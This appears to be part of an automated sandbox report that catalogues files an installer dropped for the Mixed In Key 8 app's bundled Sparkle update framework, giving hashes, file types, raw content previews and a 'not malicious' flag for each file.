                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_n3RT3j
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1234
                                                                                                    Entropy (8bit):5.180058186355181
                                                                                                    Encrypted:false
                                                                                                    MD5:00AF74FF5A6DE3F053F5CB6D3B423000
                                                                                                    SHA1:6135EA9D586BB3683E5ABE41FB36775B828A99E1
                                                                                                    SHA-256:892445137567A502BD134680082EDACE7FCFA05D957FD161B3572DE1169C87C5
                                                                                                    SHA-512:2C062E1E2651D4CD1A89085B738D286501C81E63F53D6640538594980865DC8E41024EBE3AE6992719FFA7BFE615C1B3215A49A56F55379ABE96179921172016
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>Sparkle</string>..<key>CFBundleIdentifier</key>..<string>org.andymatuschak.Sparkle</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>Sparkle</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.6 git</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>046b35c</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</ke
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_oxQCG0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):6259
                                                                                                    Entropy (8bit):5.172431285417993
                                                                                                    Encrypted:false
                                                                                                    MD5:7D0D84A1983ED9A191D00EDE11816E3D
                                                                                                    SHA1:BE86652139BA547D570BB6A66CFC8DF8056F3154
                                                                                                    SHA-256:A33594664708AF653B64E1F6AE47E5C67119898ADC258315AA9FB93B5837B882
                                                                                                    SHA-512:4EB075E1C9BBAA9D8E47908029ECBE8A0B2E9402EEDAFA77FD71746F1046B68A937ECA96E2D724016334ACC0A1563235DA459B24C9DC5AC7D6F384216DACF8B0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>ADP2,1</key>..<string>Developer Transition Kit</string>..<key>iMac1,1</key>..<string>iMac G3 (Rev A-D)</string>..<key>iMac4,1</key>..<string>iMac (Core Duo)</string>..<key>iMac4,2</key>..<string>iMac for Education (17-inch, Core Duo)</string>..<key>iMac5,1</key>..<string>iMac (Core 2 Duo, 17 or 20 inch, SuperDrive)</string>..<key>iMac5,2</key>..<string>iMac (Core 2 Duo, 17 inch, Combo Drive)</string>..<key>iMac6,1</key>..<string>iMac (Core 2 Duo, 24 inch, SuperDrive)</string>..<key>iMac8,1</key>..<string>iMac (April 2008)</string>..<key>MacBook1,1</key>..<string>MacBook (Core Duo)</string>..<key>MacBook2,1</key>..<string>MacBook (Core 2 Duo)</string>..<key>MacBook4,1</key>..<string>MacBook (Core 2 Duo Feb 2008)</string>..<key>MacBookAir1,1</key>..<string>MacBook Air (January 2008)</string>..<key>MacBookAir2,1</k
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_0YLrar
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1514
                                                                                                    Entropy (8bit):5.131381869858746
                                                                                                    Encrypted:false
                                                                                                    MD5:327891A0C12C865E4533B1468092F6C8
                                                                                                    SHA1:3BDD84609A6C9B2455F7681AA07234E5252EE18C
                                                                                                    SHA-256:E092DCAA8DCDABA9ACDC861F77F1C2C252055B8BDA3B120A76AE0891395D5BF8
                                                                                                    SHA-512:7103096A1639BABD99F0DC2BFE13898C20417C4EEC548B95CCC2B6103188B9E8624C6D96ACBD409079821467EE8F68AF2FC80A2EBFB9C325FE5589E64FCA1F4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>Autoupdate</string>..<key>CFBundleIconFile</key>..<string>Sparkle</string>..<key>CFBundleIdentifier</key>..<string>org.andymatuschak.sparkle.Autoupdate</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.6</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1.6</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlat
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_mM7FNG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Size (bytes):8
                                                                                                    Entropy (8bit):1.75
                                                                                                    Encrypted:false
                                                                                                    MD5:23B7D7D024ABB0F558420E098800BF27
                                                                                                    SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
                                                                                                    SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
                                                                                                    SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: APPL????
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/.BC.T_vXsmAf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):119344
                                                                                                    Entropy (8bit):5.440116133145609
                                                                                                    Encrypted:false
                                                                                                    MD5:708B915A9231D75036F982EB7E75B1F2
                                                                                                    SHA1:A4BC3FA949507E4B9AD7167C084004C07E281AA3
                                                                                                    SHA-256:0A516B5F43D093873A82B1E6D02C3995B69C8344290B84385E7491916540EA89
                                                                                                    SHA-512:92822D047B40B26A8A14BF44922B8AC2044FD117A725C7D3A0402074E1F87B99D348C76CEAA487256841D2A205B345C5AE5835439D62D9D5F44378D43A89F2F7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..........@.......Vw......@...............................__stubs.........__TEXT..................4.......................................__stub_helper...__TEXT..........................................................__const.........__TEXT..................@.......................................__objc_methname.__TEXT..................#.......................................__cstring.......__TEXT..........................................................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__gcc_except_tab__TEXT..........................................................__unwind_info...__TEXT..........l...............l...............................__eh_frame......__TEXT..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_EZy30A
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:data
                                                                                                    Size (bytes):41403
                                                                                                    Entropy (8bit):7.887999665341449
                                                                                                    Encrypted:false
                                                                                                    MD5:80BC51F3EC405DF93F59D53264066310
                                                                                                    SHA1:4403E2D460E6ED18C0F8994E4950F57982BED550
                                                                                                    SHA-256:D3BDF012983D7F5F40414815C3AFBB35C740D6151D628E17D7BA51491B319DBE
                                                                                                    SHA-512:C14587C4E55D2C50F1B66AE47692A373D807C6A5EB0D2E6F5D439B979101FEF1327502A69EA0B973894D80F2DD9812C080DF1522195B99E84542E80F20325DC7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: icns....is32........+ERRE+....+a......e).../........../..T)............)..a.....ee.....e.#....nz..zn....):..............:E..............EE.............D:.......4.....:#................W............P.. ............ ...".........."... P......P .....098/........+ERRE+....+a......e).../........../..T)............)..a.....ee.....e.#....nz..zn....):..............:E..............EE.............D:.......4.....:#................W............P.. ............ ...".........."... P......P .....098/........+ERRE+....+a......e).../........../..T)............)..a.....ee.....e.#....oz..zo....):..............:E..............EE.............D:.......4.....:#................W............P.. ............ ...".........."... P......P .....098/....s8mk....................................................................................................................................................................................................................................................................il3
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_wBEWmN
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11630
                                                                                                    Entropy (8bit):6.73082339431031
                                                                                                    Encrypted:false
                                                                                                    MD5:984722CB755E148570586FF148177FE8
                                                                                                    SHA1:B18B31FB225D93B5398E5693E548E46003B6BD86
                                                                                                    SHA-256:C5E5602B154E2A0AE88B5885DBBBD4F678F1CB2CE26E1049720C13F8462AEFEA
                                                                                                    SHA-512:25D7510BD8F2B184CD6B7E9EEA3780F544E69F662E735BDBD691D4A066207D65B9AC80879DAB3811964A6D9CB2D65357E5B526A19779A156417C449FF640BE26
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.@.H.^.f.i.m.n.o...........................................................................(.../.0.3.6.9.C.D.N.O.S.T.^._.`.i.p.t.x.|.....................................................................................................!.".$.3.N.....f.i.j.[.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}....U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......~.z.............. ...!."[NSClassName...._..SUStatusController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.?..4.5.6.7.8.9.:.;.<.=.>..... .[.`.g.k.o.r.t.w....A.B.C.....E.F.GXNSSource]NSDestinationWNSLabel..........I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.X.Y.Y.[.\.]VNSCellWNSFrame_..NSAllowsLogicalLayoutDirect
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_wI0lKP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4602
                                                                                                    Entropy (8bit):5.263034756225517
                                                                                                    Encrypted:false
                                                                                                    MD5:70B63D2A826BE40731A075A87C47F03F
                                                                                                    SHA1:DE53799AC32B9CC2BD16E6DFD36605E72C8AA7B5
                                                                                                    SHA-256:8C94A102BD24971BF312D36BEBC3CD67DA6328EC257CF0F59E275B2548CA4E5D
                                                                                                    SHA-512:AE52D660429F0891DC050467353A06403785CBDB2A0FA913A9E83463EE905E6083EBF0F042A2E2E0948DE45E55C8136F7C71E73D9C88431107B4BA3507DF8F83
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " ..... ........ .1%@$% $2 @....... ...... ...................... .. .......... .......... ................ .......... ...........% $1 @..........;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " ..... ...... ...........% $1 @....... ........ ...... ...... ............ ............ ........ ........ ........ .. .......... ............ ............... .........% $1 @....... ...... .................... ...... .............. .. .......... .. .......... ............;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ..............% $2 @..... ...... ............ ........ .............. .......... .1%@$;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."...... ...............% $3 @..... ........ .1%@$... .. .....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_7lnhIu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2830
                                                                                                    Entropy (8bit):4.824854318221833
                                                                                                    Encrypted:false
                                                                                                    MD5:9F1ABCCE61E95FCAE31FB24A85033AB6
                                                                                                    SHA1:EBFB357848D6657B8BDA738D8FF7BE1814298303
                                                                                                    SHA-256:60BABDFAC90136E17B9994D2A835BC95031093BA62A1C743B5F63F0A3405522F
                                                                                                    SHA-512:2552AF5F9B175CACABE0F2970D1B579353215D3A0E55AFFE427338F36E4B015C63EA9EFBC85386D3895F8E3EB8399644B901E39FB933EF59106400B9F0442D6A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$d e2%@$;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn hti ,na drt ygaia.n " =%"$1 @one sop tcautlatiaz ruqnaf nuicno aed s'dnud si c'dmitaeg .oMev u1%@$a lovtserd riceotirA lpcicaoisn ,erniciei-uol , iotnruea p orav-roh"..;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%" @@%h aseat tnitsla..al t iseat.r .llse tep r aes rtulitiaz talp oreparv geda auq e'snici.i .@% !oVel uerniciai rra?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @.. salv reis..d siopinlb e.ms.a tcau.l;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " @%% @se.t .idpsnobiel( ra aetin u@%.)V louea tcauilztra"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =%" @ont ..p re.ms.p ree csirru elad riceotird a'lpcicaoisn !sE
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_T7NYg9
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3480
                                                                                                    Entropy (8bit):5.1493807547320705
                                                                                                    Encrypted:false
                                                                                                    MD5:689382B6730CEFDEBD3AA07DF8B4A181
                                                                                                    SHA1:EC6E96BBCD6BF225F026D84B7297CEB16CAD1C16
                                                                                                    SHA-256:B6D274FDDD401FFC6DEE2A77AEF84562B4F50BE6BC190F287031F7335C9F8FFB
                                                                                                    SHA-512:0DF3228ADBCC096FE42C780FF164E65213A28E4E66F86C8064ED65CDDD49B769F9780AB48039FBEC2980A3738C428C78169FDBB98343FA08837715C56D445D02
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @yb lnitslavo.. n.aj. e.pi.rpvanek ..op.ui..t .opp .......tm.s up...tn... ..Pe.ejets ipailakic% $1 @yn.n .annitslavotaa ..nzvo upssuit?t;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " pAilakec% $1 @en.m..e.b .. tkautlazivo..an ,rpto.oe.j eps.ut...anz n zepasivotale.nh. o.md.ai ..M..e.t o.bt.C /DVD-DOR,Mo rbzad siukn be oej nen.mt. erp..ovz ..ipusn aidks ..Pe.us..eta lpkica i1%@$d oav....s ol..ykA lpkica,es up.st. eijz t hoto omu..ts..inz onuv"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$j eennjvo...j.. .odtspu.n .evzr"e.;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " eJk d siopizic% $1 @2%@$- m ..et% $3.@P ..jete eisn ny..z ok.pr.votaa tkauilazic"?.;".@%d wolnaoed"d= " kz
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_KHuGtH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2424
                                                                                                    Entropy (8bit):4.717127628221706
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3EA6E0077DA6182BBE7CC2FFCA1236
                                                                                                    SHA1:28DF08B4E8E111F7F02CA03F3157E2372A80C720
                                                                                                    SHA-256:2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
                                                                                                    SHA-512:5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_4DWGNQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3656
                                                                                                    Entropy (8bit):4.828274685627281
                                                                                                    Encrypted:false
                                                                                                    MD5:69B7C9EBCFB043EE4647310C2DF9F853
                                                                                                    SHA1:5B21F99F4F0492303EBEDFDF725F4FBA74A95E6C
                                                                                                    SHA-256:9A630D799DE61271D8E903D22A97265DA9F61B43D41D749CF03080A9A4CD0227
                                                                                                    SHA-512:0420A45902C10E12DF013C0A0EB0C2E059E9710B47A82F82013A578D7968DCCDA8727BFA6878778A94D5A6070BBFF96D0F4B1B7791B7BE91FE029738A882739A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @reh neet tgok al rit lrbgu !iV ludi snatllre egog netsraet% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nkieko dptaresen .. red t.kr.sef are nuk n.ls.ab rneeh.dF yl t1%@$t lim paep nrPgoarmmre ,egsnattrd rerf agop .rv.i eg.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @red nea tkeull eevsroi.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ritgl..gnlegi !uDh ra% $3.@S ak led nehtnsen ?u;"..%" @odnwoldade " =%" @ehtnte;"..%" @fo% "@= " 1%@$a f2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa f@%e ritgl..gnlegi"!.;". Aen wevsroi nfo% @sir aeydt onitsla!l " =E" nynv reisnoa f@%e rlkrat lii snatllreni!g;"..A" nreor rcoucrrdei n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_OwXvVk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3674
                                                                                                    Entropy (8bit):4.847547878248266
                                                                                                    Encrypted:false
                                                                                                    MD5:A1EB1385AD11092F71BA5FF256F0CEDC
                                                                                                    SHA1:A8DECBC94F5C531A7A37C54875961CDF7DF93F9B
                                                                                                    SHA-256:1F4B5B48B961337D1604691A88FDBF1B149F60E0E33E0A54A8E1D6E27938526C
                                                                                                    SHA-512:093237B75CAD280097AC304C28384F6D7CAC792800CE80D6C562235F69D84889072C5D1D37DCBC2058C7C858315EE0D5DC0B480A4267598D9B1BDA06B2B3CCC0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @uwdr eehurtnreegaled nnu dtshe tuz reVwrneudgnb reie!tM ..hcet niS e1%@$j tetzd ruhcd ein ue eeVsroi nreesztneu dnn ues attrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @aknnn citha tkauilisre tewdrne ,ewnne sov nieen moVulem nhoenS hcerbiuzrgfi fz(B. .iDksI amego ed rDCD/DV )egtsraet tuwdr.eK poeier niS e1%@$i ned nrPgoarmm erOndre ,kautlasieier niS esev nod ro.t;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @si tuz reZtid ein ueseetv re.fg.aberV reisno"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @si tevfr..bgra( iS eevwrneed neVsroi n3%@$.)M ..hcet niS eid eeneuV reisnoj tetzh renuetlrdane"?.;".@%d wolnaoed"d= " @%h renuetgrledane;"..%" @fo% "@= " 1%
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_CcHNCX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4422
                                                                                                    Entropy (8bit):5.1911339140660395
                                                                                                    Encrypted:false
                                                                                                    MD5:DA4EBB595EB2C4CF1BD8199EC95141AE
                                                                                                    SHA1:DFEF8A3FC52B07BEB322A49AEB90AC2550880193
                                                                                                    SHA-256:5E22748AC7C634DE19F1A0F0D32BECB495F646DF879F88FBA0F56F57372D4440
                                                                                                    SHA-512:BFB8435F916678EF4A291B3B4AF4B5FF26B58F91508D940F57642410F7B0483B8425C49C171E2B1F2779E171742F4C1B19F934D4249C075E002148A6919284E1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
